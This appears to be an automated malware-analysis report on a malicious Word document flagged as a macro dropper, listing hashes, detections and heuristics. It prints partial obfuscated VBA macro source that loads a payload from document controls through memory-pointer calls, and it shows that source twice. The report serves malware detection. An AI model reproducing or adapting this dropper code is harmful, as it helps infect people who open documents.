Office (OLE) malware analysis — malicious · b735c566a085dab7

MALICIOUS

Office (OLE)

195.0 KB Created: 2017-01-18 13:23:00 Authoring application: Microsoft Office Word First seen: 2019-12-09

MD5: f22bd9101ff57c1c4dc4ed1195e09f6e SHA-1: da96a4d0e85515e5b31bf107a72135e21c167575 SHA-256: b735c566a085dab76a78b7a2e4a227c1907b7cce7b3fa35fd69e47c8de605035

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV with the signature 'Doc.Dropper.ZwMacros-6057750-0'. Static analysis reveals the presence of VBA macros, specifically a Document_Open macro that utilizes a GetObject call and executes a shell command. This indicates the macro is designed to download and execute a secondary payload, a common dropper behavior.

Heuristics 6

ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14878 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14878 bytes
SHA-256: `7ae19ab82dd2f923d93b6030f42672b915a650305298104cd3cd05ef6512e50e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function puddler(gourde, gulch, backward) #If Win64 Then Dim alive As Long Dim anthonomus As Integer Dim animos As LongPtr Dim sleeping As LongPtr Dim bluishness As LongPtr Dim art As Long Dim hyperion As LongPtr Dim bolster As LongPtr #Else Dim sleeping As Long Dim aggressiveness As Integer Dim animos As Long Dim podargidae As Long Dim hyperion As Long Dim bifilar As String Dim bluishness As Long Dim sheikdom As Integer Dim bolster As Long Dim penandink As Variant Dim renewable As String #End If miscalculation = finch Or 409 allemande = dormie sleeping = gourde bolster = backward allemande = allemande hyperion = gulch crediting = 102 cooled = 25514 actuator = 386377 cooled = Pmt(0.0399, crediting, -21353, actuator, 1) allemande = aerobic animos = 114 - 47 - 68 celioma ByVal animos, sleeping, hyperion, bolster, bluishness dormie = "eonian" End Function Function storing(rectus) Dim ajar As String Dim pare As Integer Dim lice As String Dim about As Variant #If Win64 Then Dim judas As String Dim numbly As LongPtr discreet = 8 Dim leverage As Variant Dim aplasia As LongPtr Dim acknowledge As Integer Dim chimney As LongPtr Dim amenra As Long #Else Dim bullbrier As Variant Dim numbly As Long discreet = 4 Dim aplasia As Long Dim monkery As Byte Dim chimney As Long Dim gumwood As Long Dim autochthonous As Variant #End If sparingly = puddler(VarPtr(numbly), VarPtr(rectus) + 8, discreet) manichord = -1 aplasia = 56 + 91 - 54 - 93 circumscribed = 0 chimney = 9495 exemplification = 115 + 64 + 24 + 3893 deontology = 124 - 60 parcere = agape(ByVal manichord, aplasia, ByVal circumscribed, chimney, ByVal exemplification, ByVal deontology) dame = Round(473.1269 + 345.1064) finch = finch Or 242 puddler aplasia, numbly, 116 + 124 + 5354 intercede = 44 mythic = 15880 empress = 397897 foramen = SLN(empress, mythic, intercede) storing = aplasia End Function Sub auriga() Dim catalase As Byte Dim extraordinariness As Byte modillion = ThisDocument.ComputeStatistics(wdStatisticPages) Set punishable = bop.Controls.Item(modillion - 2).Tabs For Each cleaned In punishable nonaddition = 48 intrication = 20132 bassoonist = 437784 feneration = SLN(bassoonist, intrication, nonaddition) If cleaned.Index = 11 Then trussed = "accountancy" hoodlum = "awfulness" woolgathering = "discrete" hellebore = cleaned.Name End If Next gastrointestinal = 128 + 34 + 7298 blanquillo = Right(hellebore, gastrointestinal) brevier = bryopsida.footboy(blanquillo) crag = 23 extravasation = 17303 haemulon = 154000 unexcited = SLN(haemulon, extravasation, crag) lots = "eg" & "oist" agreeableness = "up" & "dating" #If Win64 Then Dim pulsion As String Dim aeolic As LongPtr Dim broody As LongPtr Dim newmade As String #Else Dim acquirements As Variant Dim broody As Long Dim adrift As Variant Dim aeolic As Long #End If bedpan = 18 - 73 + 55 elongate = "ciliary" chordeiles = 4096 hygrodeik = 14 vituss = 17890 sonneteer = 578333 vituss = Pmt(0.0775, hygrodeik, -17805, sonneteer, 1) antido = "dinornithidae" apricot = "duly" urginea = 102 alnashar = 3034 ceremony = 105126 alnashar = Pmt(0.0646, urginea, -6711, ceremony, 1) peneus = brevier amongst = "ashkey" monaurally = "pleural" aeolic = storing(peneus) orthopristis = "meliorism" #If Win64 Then Dim cyclist As String Dim touches As LongPtr insensitivity = "ren" & "dition" emptor = "outgoing" Dim proteg As LongPtr guidance = 33 + 39 + 70 + 1138 #ElseIf Win32 Then chainsmoker = "butterweed" homebound = "aph" & "eresi" & "s" Dim touches As Long lepidosauria = 98 + 416 Dim proteg As Long guidance = lepidosauria + 3204 #End If Dim consentaneousness As Integer Dim apercu As String touches = 77 - 77 ... (truncated)

SHA-256: 7ae19ab82dd2f923d93b6030f42672b915a650305298104cd3cd05ef6512e50e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function puddler(gourde, gulch, backward)
#If Win64 Then
Dim alive As Long
Dim anthonomus As Integer
Dim animos As LongPtr
Dim sleeping As LongPtr
Dim bluishness As LongPtr
Dim art As Long
Dim hyperion As LongPtr
Dim bolster As LongPtr
#Else
Dim sleeping As Long
Dim aggressiveness As Integer
Dim animos As Long
Dim podargidae As Long
Dim hyperion As Long
Dim bifilar As String
Dim bluishness As Long
Dim sheikdom As Integer
Dim bolster As Long
Dim penandink As Variant
Dim renewable As String
#End If
miscalculation = finch Or 409
allemande = dormie
sleeping = gourde
bolster = backward
allemande = allemande
hyperion = gulch
crediting = 102
cooled = 25514
actuator = 386377
cooled = Pmt(0.0399, crediting, -21353, actuator, 1)

allemande = aerobic
animos = 114 - 47 - 68
celioma ByVal animos, sleeping, hyperion, bolster, bluishness
dormie = "eonian"
End Function
Function storing(rectus)
Dim ajar As String
Dim pare As Integer
Dim lice As String
Dim about As Variant
#If Win64 Then
Dim judas As String
Dim numbly As LongPtr
discreet = 8
Dim leverage As Variant
Dim aplasia As LongPtr
Dim acknowledge As Integer
Dim chimney As LongPtr
Dim amenra As Long
#Else
Dim bullbrier As Variant
Dim numbly As Long
discreet = 4
Dim aplasia As Long
Dim monkery As Byte
Dim chimney As Long
Dim gumwood As Long
Dim autochthonous As Variant
#End If
sparingly = puddler(VarPtr(numbly), VarPtr(rectus) + 8, discreet)
manichord = -1
aplasia = 56 + 91 - 54 - 93
circumscribed = 0
chimney = 9495
exemplification = 115 + 64 + 24 + 3893
deontology = 124 - 60
parcere = agape(ByVal manichord, aplasia, ByVal circumscribed, chimney, ByVal exemplification, ByVal deontology)
dame = Round(473.1269 + 345.1064)

finch = finch Or 242

puddler aplasia, numbly, 116 + 124 + 5354
intercede = 44
mythic = 15880
empress = 397897
foramen = SLN(empress, mythic, intercede)

storing = aplasia
End Function
Sub auriga()
Dim catalase As Byte
Dim extraordinariness As Byte
modillion = ThisDocument.ComputeStatistics(wdStatisticPages)
Set punishable = bop.Controls.Item(modillion - 2).Tabs
For Each cleaned In punishable
nonaddition = 48
intrication = 20132
bassoonist = 437784
feneration = SLN(bassoonist, intrication, nonaddition)

If cleaned.Index = 11 Then
trussed = "accountancy"
hoodlum = "awfulness"
woolgathering = "discrete"
hellebore = cleaned.Name
End If
Next
gastrointestinal = 128 + 34 + 7298
blanquillo = Right(hellebore, gastrointestinal)
brevier = bryopsida.footboy(blanquillo)
crag = 23
extravasation = 17303
haemulon = 154000
unexcited = SLN(haemulon, extravasation, crag)

lots = "eg" & "oist"
agreeableness = "up" & "dating"
#If Win64 Then
Dim pulsion As String
Dim aeolic As LongPtr
Dim broody As LongPtr
Dim newmade As String
#Else
Dim acquirements As Variant
Dim broody As Long
Dim adrift As Variant
Dim aeolic As Long
#End If
bedpan = 18 - 73 + 55
elongate = "ciliary"
chordeiles = 4096
hygrodeik = 14
vituss = 17890
sonneteer = 578333
vituss = Pmt(0.0775, hygrodeik, -17805, sonneteer, 1)

antido = "dinornithidae"
apricot = "duly"
urginea = 102
alnashar = 3034
ceremony = 105126
alnashar = Pmt(0.0646, urginea, -6711, ceremony, 1)

peneus = brevier
amongst = "ashkey"
monaurally = "pleural"
aeolic = storing(peneus)
orthopristis = "meliorism"
#If Win64 Then
Dim cyclist As String
Dim touches As LongPtr
insensitivity = "ren" & "dition"
emptor = "outgoing"
Dim proteg As LongPtr
guidance = 33 + 39 + 70 + 1138
#ElseIf Win32 Then
chainsmoker = "butterweed"
homebound = "aph" & "eresi" & "s"
Dim touches As Long
lepidosauria = 98 + 416
Dim proteg As Long
guidance = lepidosauria + 3204

#End If
Dim consentaneousness As Integer
Dim apercu As String
touches = 77 - 77
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.